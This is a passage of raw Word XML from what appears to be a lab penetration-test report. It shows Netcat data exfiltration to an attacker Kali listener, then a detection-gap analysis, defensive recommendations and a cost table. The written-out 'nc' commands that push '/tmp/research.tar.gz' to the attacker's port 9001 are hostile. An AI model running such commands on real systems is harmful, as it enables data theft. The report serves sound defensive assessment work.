      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> push:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750A3286" w14:textId="77777777"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nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lvp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 9001 &gt; stolen.tar.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23413A04" w14:textId="0CFD53C1" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00DA3FF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6D82D738" wp14:editId="60D1EC10">
            <wp:extent cx="2961861" cy="570586"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="69278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87907" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId52"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3023261" cy="582414"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="185B5E55"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Attacker Kali is listening</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72067C9D" w14:textId="567B7FD1" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00000000" w:rsidP="00C60D92">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.14.135 9001 &lt; /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/research.tar.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343B882A" w14:textId="187515CD" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00DA3FF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noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5ED20B13" wp14:editId="3E6EDAB0">
            <wp:extent cx="2815751" cy="972922"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="1158441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41186" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId53"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2828411" cy="977296"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC1D436" w14:textId="0BB11977" w:rsidR="007D6DE3" w:rsidRPr="00B40682" w:rsidRDefault="007D6DE3" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_Toc215851904"/>
      <w:r w:rsidRPr="00B40682">
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00827135" w:rsidRPr="00B40682">
        <w:t>30</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:t>: Verifying the file transfer</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p w14:paraId="6AE38C1F" w14:textId="1394A78C"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HTTP pull returned a 200 OK but saved a zero-byte file, indicating an empty response. However, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> exfiltration succeeded: the Kali listener received an inbound connection from 192.168.14.13</w:t>
      </w:r>
      <w:r w:rsidR="00827135" w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, and the transferred file was verified as present and 127 bytes in size, confirming successful data exfiltration and intact payload delivery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799115BA" w14:textId="672C4274" w:rsidR="0093184D" w:rsidRPr="00B40682" w:rsidRDefault="0093184D"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CI/CD Reconnaissance &amp; Attack Surface Analysis:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A63F7D8" w14:textId="79A6C2D0"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During the engagement, a minimal assessment of the organization’s GitHub Actions CI/CD pipeline was conducted. Reconnaissance only was performed according to the Rules of Engagement; hence, no exploitation was done.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E73C7A8" w14:textId="63FDECC0"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Methodology:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62795175" w14:textId="3578537D" w:rsidR="00E311F9" w:rsidRPr="00B40682" w:rsidRDefault="00E311F9" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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Public GitHub repository information reviewed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3B2C6B" w14:textId="622603AA" w:rsidR="00E311F9" w:rsidRPr="00B40682" w:rsidRDefault="00E311F9" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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Workflow files checked for misconfigurations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F797762" w14:textId="39C29E63" w:rsidR="00E311F9" w:rsidRPr="00B40682" w:rsidRDefault="00E311F9" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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Exposed secrets or insecure triggers looked for</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3169D161" w14:textId="4570E65C" w:rsidR="00E311F9" w:rsidRPr="00B40682" w:rsidRDefault="00E311F9" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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Leak of credentials in commit history reviews</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B766AB5" w14:textId="25433A5D"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Potential Attack Paths:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCB3A7F" w14:textId="36F1C4F2" w:rsidR="00E311F9" w:rsidRPr="00B40682" w:rsidRDefault="00E311F9" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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T1552 — Unsecured Credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07305CBE" w14:textId="741D5B44" w:rsidR="00E311F9" w:rsidRPr="00B40682" w:rsidRDefault="00E311F9" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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T1190 — Exploit Public-Facing Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E55BEA2" w14:textId="6562A84F"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Thus, it was done the complete necessary coverage of on-prem, cloud, and CI/CD environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36836B70" w14:textId="4F0BE43E" w:rsidR="00AF28EE" w:rsidRPr="00656352" w:rsidRDefault="00656352" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="_Toc215851845"/>
      <w:bookmarkStart w:id="50" w:name="_Toc216881407"/>
      <w:r w:rsidRPr="00656352">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IV.  Detection Gap Analysis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:p w14:paraId="6ABD69F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Missed Alerts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F985252"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During the reconnaissance phase, there were no alerts produced although there were several high-noise activities carried out like Nmap service scans, brute-forcing of directories (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">), and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> probing. The reverse shells on ports 4444 and 8080 also did not get detected which indicates lack of monitoring for outbound connections. In the same way, the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-based persistence method did not create any system-level alert and the SMB enumeration against the Windows Server did not trigger any security event suggesting poor logging and monitoring in both Linux and Windows environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119B0934"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Control Failures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BCDBA6" w14:textId="10622B25"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Host intrusion detection (HIDS), egress filtering, and process-creation auditing were unavailable in the </w:t>
      </w:r>
      <w:r w:rsidR="00827135" w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DVWA </w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">making it vulnerable to reverse-shell execution and unlimited outbound TCP connections. The absence of Apache hardening and header controls lead to the exposure of unnecessary metadata. The Windows Server had SMB access controls that were not strict enough to prevent enumeration attempts. Moreover, there were no SIEM correlation rules in place so no alerts were generated in the case of unusual authentication attempts, new scheduled </w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>tasks, or repeated directory enumeration. There was also no network segmentation in the cloud-simulated environment which allowed the attacker to communicate directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4314EA"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Reasons for Successful Attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B865C41"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attack was successful due to the default settings in the environment, the absence of telemetry and the opening of unrestricted outbound traffic. There were no behavioural analytics, endpoint detection or monitoring based on anomalies, making it easy for the C2 communication to be done stealthily, persistence to be created and data to be exfiltrated without being resisted or detected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8DFE34" w14:textId="34191F7E" w:rsidR="00AF28EE" w:rsidRPr="00656352" w:rsidRDefault="00656352" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="_Toc215851846"/>
      <w:bookmarkStart w:id="52" w:name="_Toc216881408"/>
      <w:r w:rsidRPr="00656352">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>V. Strategic Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
      <w:bookmarkEnd w:id="52"/>
    </w:p>
    <w:p w14:paraId="6E5E13DD"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Control Improvements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2CF29B" w14:textId="6DE111A1" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00000000" w:rsidP="00C60D92">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing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All administrator and remote accounts must be protected by multi-factor authentication (MFA) that is strong and resistant to phishing attacks. Using FIDO2 security keys or number-matching as an option will make it even more difficult for hackers to pass through the authentication process </w:t>
      </w:r>
      <w:r w:rsidR="007E57E5" w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[2].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1963FEC0" w14:textId="5558146D" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00000000" w:rsidP="00C60D92">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing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Speed up and standardize the patch process by rolling out critical OS and application updates to both IT and lab systems. Such practice will eliminate known high-risk vulnerabilities frequently exploited by attackers </w:t>
      </w:r>
      <w:r w:rsidR="00421EBC" w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[13].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C30C872" w14:textId="7D726AF4" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00000000" w:rsidP="00C60D92">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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Host security will be enhanced by the deactivation of unused services such as SMBv1, limiting the use of admin tools like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PsExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and WMI, and allowing only approved applications to run while banning unapproved ones, such as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, through application allow-listing </w:t>
      </w:r>
      <w:r w:rsidR="00112949" w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[9].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668675D5"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Visibility Enhancements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6363F7" w14:textId="271085E1" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00000000" w:rsidP="00C60D92">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing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Implement the EDR platform for the entire organization and switch on the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>behavior</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> detectors for detection of suspicious tools, reverse shells and unusual process activity. According to Microsoft, if EDR is used in block mode, the time when attackers remain unnoticed can be cut down significantly </w:t>
      </w:r>
      <w:r w:rsidR="00112949" w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[9].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FED0AD" w14:textId="0E703FF5" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00000000" w:rsidP="00C60D92">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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Introduce notifications for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/at job modifications and for processes similar to reverse shells. Elastic, among others, is already selling the rules "Cron Job Created or Modified" and "Potential Reverse Shell via Suspicious Child Process". Integrating these alerts into the SIEM would help in network activity correlation </w:t>
      </w:r>
      <w:r w:rsidR="00B96FF4" w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[5].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74983D6F"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Architectural Changes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F79BB32"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application of micro-segmentation by CPC should result in the isolation of cloud servers, AD, and developer systems from one another, thus eliminating the possibility of unauthorized communication between them. The adoption of Zero Trust network rules suggested by NIST (2020) will not only minimize but also control the routes for attackers to access the network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0F27FB" w14:textId="7F97AA2F" w:rsidR="00AF28EE" w:rsidRPr="00656352" w:rsidRDefault="00656352" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="_Toc215851847"/>
      <w:bookmarkStart w:id="54" w:name="_Toc216881409"/>
      <w:r w:rsidRPr="00656352">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>VI. Cost–Benefit Analysis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
      <w:bookmarkEnd w:id="54"/>
    </w:p>
    <w:p w14:paraId="3A2B7272" w14:textId="0F3E2037" w:rsidR="007D6DE3" w:rsidRPr="00B40682" w:rsidRDefault="007D6DE3" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="_Toc215851908"/>
      <w:r w:rsidRPr="00B40682">
        <w:t>Table 2: Cost of Proposed Controls</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a0"/>
        <w:tblW w:w="4326"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2046"/>
        <w:gridCol w:w="2280"/>
      </w:tblGrid>
      <w:tr w:rsidR="00656352" w:rsidRPr="00B40682" w14:paraId="5C3C8380" w14:textId="77777777" w:rsidTr="00656352">
        <w:trPr>
          <w:trHeight w:val="52"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2046"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7E1ECAEC" w14:textId="77777777" w:rsidR="00656352" w:rsidRPr="00B40682" w:rsidRDefault="00656352" w:rsidP="00C60D92">
            <w:pPr>
              <w:spacing w:before="240" w:after="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Control Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2280" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="7" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="7" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="7" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="7" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="073763"/>
            <w:tcMar>
              <w:top w:w="20" w:type="dxa"/>
              <w:left w:w="20" w:type="dxa"/>
              <w:bottom w:w="20" w:type="dxa"/>
              <w:right w:w="20" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1EE542B3" w14:textId="77777777" w:rsidR="00656352" w:rsidRPr="00B40682" w:rsidRDefault="00656352" w:rsidP="00C60D92">
            <w:pPr>
              <w:spacing w:before="240" w:after="0" w:line="240" w:lineRule="auto"/>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Estimated Annual Cost</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00656352" w:rsidRPr="00B40682" w14:paraId="372EC5C6"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188DA15D"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EDR/XDR   Deployment</w:t>
            </w:r>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62000E3B"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£80,000–£120,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
